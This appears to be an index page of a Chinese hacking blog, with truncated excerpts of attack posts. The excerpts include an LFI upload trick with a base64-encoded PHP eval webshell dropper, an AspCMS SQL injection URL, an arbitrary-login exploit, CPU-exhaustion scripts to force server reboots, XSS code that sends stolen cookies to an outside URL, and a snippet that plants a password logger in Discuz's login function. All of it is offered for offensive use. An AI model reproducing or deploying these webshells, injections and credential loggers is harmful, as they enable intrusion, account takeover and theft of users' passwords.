LFI漏洞使用心得

1.找到LFI本地包含的漏洞 2.想办法上传不管是通过bbs,FCKEDITOR或者其他任何方式 3.使用如下代码 gif89a0<?fputs(fopen("3.php", "w"), base64_decode("JTNDJTNGcGhwJTIwQGV2YWwlMjglMjRfUE9TVCU1Qm5vdGhhY2slNUQlMjklM0IlM0YlM0U="));?>  ...

- 阅读全文 -

aspcms cookies欺骗和后台无验证注入

后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗! ————————后台注射————————   https://www.webshell.cc/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,l...

- 阅读全文 -

多多返利程序,任意用户登录,甚至可以提现

简要描述:多多返利程序,任意用户登录,甚至可以提现! 详细说明:https://www.webshell.cc/uc.php 在后台未开启ucenter时候,存在典型的UC_key未初始化漏洞 由于UCkey未初始化导致访问者可以随意调用uc接口的各种函数 其中包括自动登陆 修改密码 漏洞证明:poc: <?php print_r(' -----------------------------...

- 阅读全文 -

webshell低权限重启服务器方法

有时候需要重启服务器,但是又没那么高的权限。 除了DDOS以外,还可以让管理员来帮你重启! 把下面的代码保存为cq.asp,然后在访问,会占用CPU很高,管理员会重启。 <% for i = 1 to 100 i = 10 next %> sqlserver下DB-OWNER权限重启服务器: while 1<9 begin select char(0) end–

- 阅读全文 -

XSS Hack:获取浏览器记住的明文密码

0x01. XSS获取明文密码的多种方式   我已经感受到Web潮流带来的巨大革新,尤其是最近HTML5越来越火。浏览器们在客户端瓜分 着这个Web OS,只要是对用户体验好的功能,浏览器之间就会互相学习,然后去实现,但是 实现总是存在一些差异,有些差异是用户体验上的,有些则可能带来安全问题。 这篇文章是想深入描述下浏览器记住用户密码这种机制带来的安全问题与实现上的一些差异 性。黑客们如...

- 阅读全文 -

phpcmsV9 SQL注射与列目录漏洞详解

漏洞文件:phpcmsmodulesattachmentattachments.php SQL注射漏洞相关代码: public function album_load() { if(!$this->admin_username) return false; if($_GET['args']) extract(getswfinit($_GET['args'])); if($_GET['dosu...

- 阅读全文 -

跨站提取cookie的原理

个人理解为跨站就意味着可以执行javascript代码,javascript利用Document文档对象的cookie属性就获取到了cookie,然后就可能利用cookie欺骗登陆。 跨站提取cookie的原理 等价于 如何从在浏览器中获取cookie + 发送cookie到指定url 比如: <script>document.write('<img src="http://ww...

- 阅读全文 -

Discuz 密码记录

//打开source/function/function_member.php //找到function userlogin //在return $return;前面加上 $a=file_get_contents(dirname(__FILE__).’/1.txt’); file_put_contents(dirname(__FILE__).’/1.txt’),$a.”Id:”.$username...

- 阅读全文 -